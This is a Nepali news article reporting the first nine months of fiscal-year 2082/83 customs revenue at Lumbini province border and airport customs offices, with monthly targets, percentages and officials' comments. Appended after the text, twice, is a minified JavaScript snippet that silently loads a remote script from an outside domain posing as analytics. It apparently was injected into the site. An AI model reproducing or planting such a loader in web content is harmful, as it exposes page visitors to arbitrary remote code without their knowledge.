लुम्बिनी प्रदेशका भन्सारमा राजस्व संकलनमा सुधारको सङ्केत

मेचीकाली संवाददाता

१५ बैशाख २०८३, मंगलवार
263 shares

रमेश पराजुली

बुटवल । लुम्बिनी प्रदेशका ८ वटा भन्सार कार्यालयले चालू आर्थिक वर्ष २०८२/०८३ को पहिलो ९ (साउन–चैत) मा राजस्व संकलनमा सुधारको सङ्केत देखाएका छन् । लुम्बिनीका प्रदेशका तराईका जिल्ला रुपन्देही, कपिलवस्तु, दाङ, बाँके, बर्दिया र नवलपरासी पश्चिममा भन्सार नाका रहेका छन् । प्रदेशको सबैभन्दा ठुलो तथा मुलुककै दोस्रो ठुलो भैरहवा भन्सार (बेलहिया) नाकामा ९ महिनामा कुल लक्ष्यको ७१ प्रतिशत राजस्व संकलन भएको छ ।

उक्त अवधिमा कुल वार्षिक लक्ष्यको ७१ प्रतिशत अर्थात् ७८ अर्ब ४९ करोड ३९ लाख रुपैयाँ राजस्व संकलन भएको भन्सार कार्यालयका प्रमुख हरिहर पौडेलले जानकारी दिए । जुन अघिल्लो आवको सोही अवधिको तुलनामा १४.३४ प्रतिशतले बढी हो । गत आवको ९ महिनामा ६८ अर्ब ६५ करोड रुपैयाँ मात्रै राजस्व उठेको थियो । भन्सार विभागले भैरहवा भन्सार कार्यालयलाई चालू आवका लागि १ खर्ब १३ अर्ब ६६ करोड रुपैयाँ राजस्व संकलन गर्ने लक्ष्य दिएको छ । भैरहवा भन्सार कार्यालयले अघिल्लो आवमा कुल लक्ष्यको ८७.०७ प्रतिशत राजस्व संकलन गरेको थियो ।

पछिल्लो समय राजस्व चुहावट नियन्त्रण भएको र समग्र आर्थिक गतिविधि पनि बढेकोले चालू आर्थिक वर्षको ९ महिनाको समग्र राजस्व संकलनको अवस्था हेर्दा उल्लेखनीय सुधार देखिएको प्रमुख पौडेलले बताए । ‘गत भदौमा ‘जेनजी आन्दोलन’ का कारण केही समय भन्सार गतिविधि प्रभावित भए पनि पछिल्लो समय आयात–निर्यातसँग सम्बन्धित व्यापारिक गतिविधि पुनः बढ्दै गएका छन् ।’ कार्यालय प्रमुख पौडेलले भने,‘गत आवको तुलनामा चालू आवमा हालसम्मको राजस्व असुलीमा उल्लेखनीय सुधार देखिएको छ । अझै तीन महिना बाँकी रहेकाले विभागले तोकेको लक्ष्यलाई यस वर्ष भेटाउने गरी काम गरिरहेका छौँ ।’
आयात परिमाणका हिसाबले भैरहवा मुलुकको दोस्रो ठुलो भन्सार नाका हो । गत आर्थिक वर्षमा भने यो भन्सारले असोज महिनामा मात्रै लक्ष्य पूरा गर्न सकेको थियो । जेनजी आन्दोलनका क्रममा भैरहवा भन्सार कार्यालयमा पनि क्षति पुगेको थियो । आगलागिले भवन र अन्य संरचनासँगै विभिन्न उपकरणमा क्षति पुगेपछि केहि समय पाल टाँगेर भन्सारको काम गरिएको थियो । अहिले भने पुरानै भवनबाट नियमित काम भइरहेको कार्यालय प्रमुख पौडेलले बताए । हालै सरकारले एक सय रुपैयाँभन्दा बढीको समान ल्याउँदा अनिवार्य रुपमा भन्सार बुझाउनुपर्ने नियम ल्याएसँगै यहाँपनि कडाइका साथ लागू गरिएको उनले बताए । यसले राजस्व संकलनमा थप टेवा पुग्ने अपेक्षा गरिएको छ ।

कुन महिनामा कति राजस्व संकलन ?
भैरहवा भन्सार कार्यालयका सूचना अधिकारी उद्धव ढुंगानाका अनुसार चालू आर्थिक वर्षको साउन र चैत महिनामा मात्रै लक्ष्यभन्दा धेरै राजस्व संकलन भएको छ । पहिलो महिनामा लक्ष्यभन्दा बढी राजस्व संकलन गरेको भन्सारले त्यसपछिका ७ महिनामा लक्ष्य भेट्टाउन सकेको थिएन । साउनमा ८ अर्ब ८४ करोड ८४ लाख ९० हजार रुपैयाँ राजस्व संकलन गर्ने लक्ष्य राखेकोमा १०२.०५ प्रतिशत अर्थात् ९ अर्ब २९ करोड ४३ लाख ४ हजार रुपैयाँ राजस्व संकलन भएको थियो । भदौमा ९ अर्ब ७० करोड ६३ लाख ९ हजार रुयैयाँ संकलन गर्ने लक्ष्य राखेकोमा ९७.२५ प्रतिशत अर्थात् ९ अर्ब ४३ करोड ९२ लाख २४ हजार रुपैयाँ संकलन भएको थियो ।

यस्तै, भैरहवा भन्सारमा असोजमा १० अर्ब १ करोड ७४ लाख १ हजार संकलन गर्ने लक्ष्य राखेकोमा ९२.७१ प्रतिशत अर्थात् ९ अर्ब २८ करोड ६७ लाख २० हजार, कात्तिकमा ९ अर्ब ६० करोड २६ लाख ४० हजार संकलन गर्ने लक्ष्य राखेकोमा ८२.२७ प्रतिशत अर्थात् ७ अर्ब ८९ करोड ९६ लाख ३९ हजार, मंसिरमा ८ अर्ब ५८ करोड ७० लाख २० हजार संकलन गर्ने लक्ष्य राखेकोमा ९३.३३ प्रतिशत अर्थात् ८ अर्ब १४ करोड ५५ लाख ९ हजार रुपैयाँ संकलन भएको सूचना अधिकारी ढुंगानाले जानकारी दिए ।

त्यस्तैगरी पुस महिनामा ८ अर्ब ७७ करोड ७७ लाख ७१ हजार संकलन गर्ने लक्ष्य राखेकामा ८२.१० प्रतिशत अर्थात् ७ अर्ब २० करोड ५९ लाख ९७ हजार, माघमा ८ अर्ब ७५ करोड २८ लाख ५६ हजार संकलन गर्ने लक्ष्य राखेकोमा ९९.०७ प्रतिशत अर्थात् ८ अर्ब ६७ करोड १३ लाख ८८ हजार, फागुनमा ८ अर्ब ८७ करोड ११ लाख ९३ हजार संकलन गर्ने लक्ष्य राखेकोमा ९३.२० प्रतिशत अर्थात् ८ अर्ब २६ करोड ७५ लाख २० हजार रुपैयाँ राजस्व संकलन भएको थियो ।
यस्तै चालू आर्थिक वर्षको चैत महिनामा लक्ष्य पूरा गरी झण्डै १० प्रतिशत धेरै राजश्व संकलन भएको छ । ९ अर्ब ७३ करोड २६ लाख ५१ हजार संकलन गर्ने लक्ष्य राखेकोमा १०९.७३ प्रतिशत अर्थात् १० अर्ब ६७ करोड ९३ लाख ६६ हजार राजस्व संकलन भएको छ ।

बेलहिया नाकाबाट सबैभन्दा बढी मोटरसाइकल (सबै प्रकारका), जीप, कार, भ्यान, पेट्रोल, डिजेल, सिंगल÷डबल क्याप पिकप गाडी, विद्युतीय जीप, कार, भ्यान, शुद्ध फलाम (स्पोन्ज/फेरेस आइरन), एम.एस विलेट, खाना पकाउने (एलपी) ग्यास, चकलेट, खाद्यान्न र अन्य व्यापारिक वस्तुको वस्तुको आयात हुने गरेको छ ।

यस्तै यहाँबाट भटमासको प्रशोधित तेल, सेन्थेटिक ¥यान, आल्मोनियमका तार, सिमेन्ट खैरो, सिमेन्ट क्लिङकर, खयर कत्था, चाउचाउ, नुडल्स, पास्ता, फलाम वा स्टिलका भाँडा, सूर्यमुखीको प्रशोधित तेल, जडीबुटी, खोटो रोजिन, प्लाइउड र अन्य वनस्पतीजन्य उत्पादनहरु निर्यात हुने गर्दछन् । साना सवारी साधन, फलामे एमएस ब्लेड र पेट्रोलियम पदार्थ आयातबाट भैरहवा भन्सारको कुल राजस्व संकलनमा झण्डै २५ प्रतिशत योगदान रहने गरेको बताइन्छ । सशस्त्र प्रहरी बल २७ नम्बर गण रुपन्देहीका प्रमुख सशस्त्र प्रहरी उपरीक्षक नवराज बोहराले रुपन्देहीका सबै सीमा क्षेत्रमा कडाइ गरिएको बताए ।

नेपालगञ्जमा ८३ प्रतिशत राजस्व संकलन
लुम्बिनी प्रदेशको दोस्रो ठुलो बाँकेको नेपालगञ्ज भन्सार कार्यालयले चालू आर्थिक वर्षको ९ महिनामा कुल लक्ष्यको ८३.३३ प्रतिशत राजस्व संकलन गर्न सफल भएको छ । भन्सार विभागले चालू आवका लागि २४ अर्ब ५४ करोड ५७ लाख रुपैयाँ राजस्व संकलन गर्ने लक्ष्य दिएको छ । जसमा १४ अर्ब ८९ करोड ६९ लाख रुपैयाँ संकलन भएको भन्सार कार्यालयका सूचना अधिकारी पवित्रकुमार खड्काले जानकारी दिए ।

नेपालगञ्ज भन्सार कार्यालयले चालू आवका कुनै पनि महिनामा लक्ष्य पूरा गर्न सकेको छैन । सूचना अधिकारी खड्काका अनुसार साउनमा १ अर्ब ३८ करोड ३७ लाख ८४ हजार (७४.१३ प्रतिशत), भदौमा १ अर्ब ४३ करोड २० लाख १९ हजार (७३.९५ प्रतिशत), असोजमा १ अर्ब ६६ करोड ५ लाख ९५ हजार (८३.७३ प्रतिशत), कात्तिकमा १ अर्ब ५३ करोड ७० लाख ८२ हजार (७२.२९ प्रतिशत), मंसिरमा १ अर्ब ६३ करोड ८५ लाख १० हजार (८३.४४ प्रतिशत), पुसमा १ अर्ब ६९ करोड ४१ लाख ३२ हजार (८३.२६ प्रतिशत), माघमा १ अर्ब ७० करोड ४ लाख ६७ हजार (८८.२४ प्रतिशत), फागुनमा १ अर्ब ७० करोड ७७ लाख ९५ हजार (८८.३१ प्रतिशत) र चैतमा २ अर्ब १४ करोड २५ लाख ५४ हजार (९८.३६ प्रतिशत) राजस्व संकलन भएको छ ।
कृष्णनगर भन्सारमा ६६ प्रतिशत राजस्व संकलन

यस्तै, कपिलवस्तुको कृष्णनगर भन्सार कार्यालयले चालू आर्थिक वर्षको ९ महिनाको अवधिमा कुल लक्ष्यको ६६.७५ प्रतिशत मात्रै राजस्व संकलन गर्न सफल भएको छ । भन्सार विभागले चालू आवका लागि ५ अर्ब ८६ करोड ८४ लाख रुपैयाँ राजस्व संकलन गर्ने लक्ष्य तोकेकोमा हालसम्म ३ अर्ब ९१ करोड ६९ लाख रुपैयाँ संकलन भएको भन्सार कार्यालयका सूचना अधिकारी मयंककुमार कर्णले जानकारी दिए ।

कृष्णनगर भन्सार कार्यालयले चालू आवको चैत महिनामा मात्र लक्ष्यभन्दा बढी ११३.०३ प्रतिशत राजस्व संकलन गरेको छ । सूचना अधिकारी कर्णका अनुसार साउनमा ३ अर्ब ९९ करोड ९० लाख २ हजार (८२.६४ प्रतिशत), भदौमा ४ अर्ब २६ करोड ८१ हजार (८५.२९ प्रतिशत), असोजमा ४ अर्ब ११ करोड ९० लाख (८३.३६ प्रतिशत), कात्तिकमा ४ अर्ब १७ करोड १ लाख १४ हजार (८३.३५ प्रतिशत), मंसिरमा ४ अर्ब २६ करोड ४ लाख ७६ हजार (९१.९४ प्रतिशत), पुसमा ४ अर्ब ३५ करोड ४ लाख ८५ हजार (९०.९९ प्रतिशत), माघमा ४ अर्ब २१ लाख ३६ हजार (८६.४२ प्रतिशत), फागुनमा ४ अर्ब ३८ करोड ३ लाख ४० हजार (९६.३७ प्रतिशत) र चैतमा ५ अर्ब ६० करोड ५ लाख ३४ हजार (११३.०३ प्रतिशत प्रतिशत) राजस्व संकलन भएको छ ।

सुठौली भन्सारमा ९६ प्रतिशत राजस्व संकलन
यस्तैगरी कपिलवस्तुको सुठौली भन्सार कार्यालयले चालू आर्थिक वर्षको ९ महिनाको अवधिमा कुल लक्ष्यको ९६.६० प्रतिशत राजस्व संकलन गर्न सफल भएको छ । भन्सार विभागले चालू आवका लागि १ अर्ब १० करोड ५२ लाख ५२ हजार रुपैयाँ राजस्व संकलन गर्ने लक्ष्य तोकेकोमा हालसम्म १ अर्ब ६ करोड ७६ लाख रुपैयाँ संकलन भएको भन्सार कार्यालयका सूचना अधिकारी भीमबहादुर लामाले जानकारी दिए ।

सुठौली भन्सार कार्यालयले चालू आवको साउन र भदौबाहेक अन्य सबै महिनामा
लक्ष्य भन्दा बढी राजस्व संकलन गरेको छ । सूचना अधिकारी लामाका अनुसार साउनमा ८ करोड ८८ लाख ६० हजार (९७.४७ प्रतिशत), भदौमा ९ करोड ४१ लाख १९ हजार (९८.६७ प्रतिशत), असोजमा १४ करोड ६१ लाख ४६ हजार (१५९.२८ प्रतिशत), कात्तिकमा ९ करोड ३२ लाख ५२ हजार (१००.४९ प्रतिशत), मंसिरमा १२ करोड ६८ लाख ११ हजार (१३६.१४ प्रतिशत), पुसमा १२ करोड ८२ लाख ६२ हजार (१३५.३१ प्रतिशत), माघमा १२ करोड २५ लाख २० हजार (१३७.४५ प्रतिशत), फागुनमा १० करोड २१ लाख ५९ हजार (११६.७५ प्रतिशत) र चैतमा १६ करोड ५५ लाख ५५ हजार (१८०.११ प्रतिशत) राजस्व संकलन भएको छ ।

राजापुर भन्सारमा ८२ प्रतिशत राजस्व संकलन
यस्तै बर्दियाको राजापुर भन्सार कार्यालयले चालू आर्थिक वर्षको ९ महिनाको अवधिमा कुल लक्ष्यको ८२.८२ प्रतिशत राजस्व संकलन गर्न सफल भएको छ । भन्सार विभागले चालू आवका लागि ३ करोड १६ लाख ३ हजार रुपैयाँ राजस्व संकलन गर्ने लक्ष्य तोकेकोमा हालसम्म २ करोड ४९ लाख ८३ हजार रुपैयाँ संकलन भएको भन्सार कार्यालयका सूचना अधिकारी प्रमोद कुशवाहाले जानकारी दिए ।

सूचना अधिकारी कुशवाहाका अनुसार साउनमा ११ लाख ७१ हजार (४९.७७ प्रतिशत), भदौमा २० लाख ९६ हजार (८१.०८ प्रतिशत), असोजमा २८ लाख ७८ हजार (११७.४० प्रतिशत), कात्तिकमा १३ लाख ५५ हजार (५२.१६ प्रतिशत), मंसिरमा १२ लाख २१ हजार (५१.१२ प्रतिशत), पुसमा १० लाख ७९ हजार (४६.५४ प्रतिशत), माघमा ५४ लाख ९० हजार (२३५.९६ प्रतिशत), फागुनमा ३८ लाख ८८ हजार (१५६.५३ प्रतिशत) र चैतमा ५८ लाख (२२८.८३ प्रतिशत) राजस्व संकलन भएको छ ।

यस्तैगरी नेपालको दोस्रो अन्तर्राष्ट्रिय विमानस्थल भैरहवास्थित गौतमबुद्ध अन्तर्राष्ट्रिय विमानस्थल भन्सार महसुल असुलीमा कमजोर देखिएको छ । गौतमबुद्ध अन्तर्राष्ट्रिय विमानस्थल भन्सार कार्यालयले चालू आर्थिक वर्षमा ६० लाख रुपैयाँ भन्सार राजस्व संकलनको लक्ष्य पाएको थियो । तर, कार्यालयले चैत मसान्तसम्म ९ महिनाको अवधिमा ५ लाख ७४ हजार रुपैयाँ अर्थात् ९.५६ प्रतिशत मात्र राजस्व संकलन गरेको छ । विमानस्थलमा अन्तर्राष्ट्रिय उडान नियमित हुन नसक्दा लक्ष्यअनुसार राजस्व संकलन हुन नसकेको विमानस्थल भन्सार कार्यालयले जनाएको छ ।

उता, दाङको कोइलावास भन्सार कार्यालयले चालू आर्थिक वर्षको ९ महिनाको अवधिमा कुल लक्ष्यको ७६ प्रतिशत राजस्व संकलन गर्न सफल भएको छ । भन्सार विभागले चालू आवका लागि १ करोड ७४ लाख रुपैयाँ राजस्व संकलन गर्ने लक्ष्य तोकेकोमा हालसम्म १ करोड ३३ लाख रुपैयाँ संकलन भएको भन्सार कार्यालय प्रमुख लोकबहादुर विष्टले जानकारी दिए ।
बुटवल उद्योग वाणिज्य संघका अध्यक्ष हरिप्रसाद अर्यालले कोभिड महामारीपछि शिथिल बनेको देशको अर्थतन्त्रमा सामान्य सुधारका संकेत देखापरेकाले राजस्व संकलनमा केही सुधार आएको बताए । ‘राज्यले व्यावसायी मैत्री वातावरण सिर्जना गरेर व्यवसायीहरुलाई प्रोत्साहन गर्ने हो भने चालू आर्थिक वर्षमा राजस्वको लक्ष्य भेट्टाउन सकिन्छ ।’ उनले भने,‘सरकारले आयातभन्दा निर्यात बढाउनेतर्फ ध्यान दिन जरुरी छ ।’

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);